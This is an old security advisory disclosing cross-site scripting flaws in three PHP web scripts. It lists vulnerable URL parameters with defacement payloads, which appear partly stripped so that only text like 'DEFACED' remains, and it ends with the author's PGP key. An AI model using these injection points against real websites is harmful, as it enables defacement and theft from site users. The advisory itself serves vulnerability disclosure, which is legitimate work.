###################################################################### [Psymera Advisory #1] CjTagBoard 3.0 - CjLinkOut 1.0 - CjWeb2Mail 3.0 ###################################################################### Software: CjTagBoard CjLinkOut CjWeb2Mail Versions: CjTagBoard =3.0 CjLinkOut =1.0 CjWeb2Mail =3.0 Language: PHP Type: Cross Side Script Risc: Low Examples: A] CjTagBoard XSS B] CjLinkOut XSS C] CjWeb2Mail XSS Exploitation: remote Date: 07 Sep 2005 Vendor: Cj Desing Page: http://www.cj-design.com/ Author: Psymera e-mail: psymera@hotmail.com ###################################################################### ----------------- A] CjTagBoard XSS ----------------- http://[target]/[folder]/details.php?date=

DEFACED

http://[target]/[folder]/details.php?time=

DEFACED

http://[target]/[folder]/details.php?name=

DEFACED

http://[target]/[folder]/details.php?ip=

DEFACED

http://[target]/[folder]/details.php?agent=

DEFACED

http://[target]/[folder]/display.php?msg=

DEFACED

---------------- B] CjLinkOut XSS ---------------- http://[target]/[folder]/top.php?123=">

hola

< ----------------- C] CjWeb2Mail XSS ----------------- http://[target]/[folder]/thankyou.php?name=

Defaced

http://[target]/[folder]/thankyou.php?sent=1&name=

Defaced

http://[target]/[folder]/thankyou.php?sent=1&message=

Defaced

http://[target]/[folder]/thankyou.php?sent=1&show_ip=yes&ip=

deface

http://[target]/[folder]/web2mail.php?error_messages=yes&emsg=

Deface

####################################################################### -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGP 8.0 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 =V+P0 -----END PGP PUBLIC KEY BLOCK-----